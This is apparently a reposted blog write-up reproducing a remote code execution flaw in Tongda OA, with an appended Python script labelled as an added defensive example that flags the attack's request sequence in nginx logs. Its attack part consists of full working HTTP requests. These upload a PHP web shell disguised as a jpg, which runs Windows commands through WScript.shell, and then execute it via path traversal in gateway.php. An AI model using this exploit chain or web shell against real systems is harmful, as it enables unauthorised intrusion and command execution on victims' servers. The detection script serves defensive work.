• Tongda OA RCE reproduction


    Tongda OA download: link: https://pan.baidu.com/s/1c0P-M-IyY5VxfH5d0qKHsQ extraction code: l0pc

    Cause of the vulnerability: unauthenticated file upload + file inclusion (a shell can also be obtained by including the nginx log)

    Request (the upload step):

    POST /ispirit/im/upload.php HTTP/1.1
    Host: 192.168.1.250
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Referer: http://192.168.95.129/logincheck.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: multipart/form-data; boundary=--------1673801018
    Content-Length: 556
    
    ----------1673801018
    Content-Disposition: form-data; name="UPLOAD_MODE"
    
    2
    ----------1673801018
    Content-Disposition: form-data; name="P"
    
    123
    ----------1673801018
    Content-Disposition: form-data; name="DEST_UID"
    
    2
    ----------1673801018
    Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
    Content-Type: image/jpeg
    
    <?php
    $command=$_POST['cmd'];
    $wsh = new COM('WScript.shell');
    $exec = $wsh->exec("cmd /c ".$command);
    $stdout = $exec->StdOut();
    $stroutput = $stdout->ReadAll();
    echo $stroutput;
    ?>
    ----------1673801018--
    

    Response:
    +OK [vm]258@2003_564066977|jpg|0[/vm]

    Then the uploaded file is included directly to get a shell:

    POST /ispirit/interface/gateway.php HTTP/1.1
    Host: 192.168.1.250:8083
    Content-Length: 97
    Cache-Control: max-age=0
    Origin: http://192.168.1.250:8083
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.1.250:8083/ispirit/interface/gateway.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=952b1f1; PHPSESSID=lcq472fa3fm9u7k8dmlg0ofap4
    Connection: close
    
    json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F564066977.jpg%22%7D&cmd=whoami
    

    PoC (URL-decoded body): json={"url":"/general/../../attach/im/2003/564066977.jpg"}&cmd=whoami
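    As an added defensive example (not part of the original post), the following script correlates the two endpoints used above in an nginx access log: a POST to /ispirit/im/upload.php followed shortly by a POST to /ispirit/interface/gateway.php from the same client. It assumes the standard nginx "combined" log format; the POST body (where the traversal path lives) is not logged, so the endpoint sequence per client is the signal. The log lines are constructed sample data.

```python
import re
from datetime import datetime, timedelta

# nginx "combined" access-log line: ip ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The two endpoints chained in the write-up.
UPLOAD_PATH = "/ispirit/im/upload.php"
INCLUDE_PATH = "/ispirit/interface/gateway.php"

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))

def detect_upload_then_include(lines, window_seconds=300):
    """One alert per client that POSTs to upload.php (HTTP 200) and then,
    within window_seconds, POSTs to gateway.php."""
    last_upload = {}   # ip -> timestamp of most recent successful upload
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method != "POST":
            continue
        if path == UPLOAD_PATH and status == 200:
            last_upload[ip] = ts
        elif path == INCLUDE_PATH and ip in last_upload:
            if ts - last_upload[ip] <= timedelta(seconds=window_seconds):
                alerts.append((ip, last_upload.pop(ip), ts))
    return alerts

# Constructed sample log: one attacker-like sequence, one benign client.
SAMPLE_LOG = [
    '192.168.95.129 - - [22/Mar/2020:10:00:01 +0800] "POST /ispirit/im/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"',
    '192.168.95.129 - - [22/Mar/2020:10:00:05 +0800] "POST /ispirit/interface/gateway.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [22/Mar/2020:10:01:00 +0800] "POST /ispirit/im/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [22/Mar/2020:11:30:00 +0800] "POST /ispirit/interface/gateway.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, up, inc in detect_upload_then_include(SAMPLE_LOG):
        print(f"ALERT {ip}: upload at {up.isoformat()} then include at {inc.isoformat()}")
```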

  • Original URL: https://www.cnblogs.com/nul1/p/12566816.html
Copyright © 2020-2023  润新知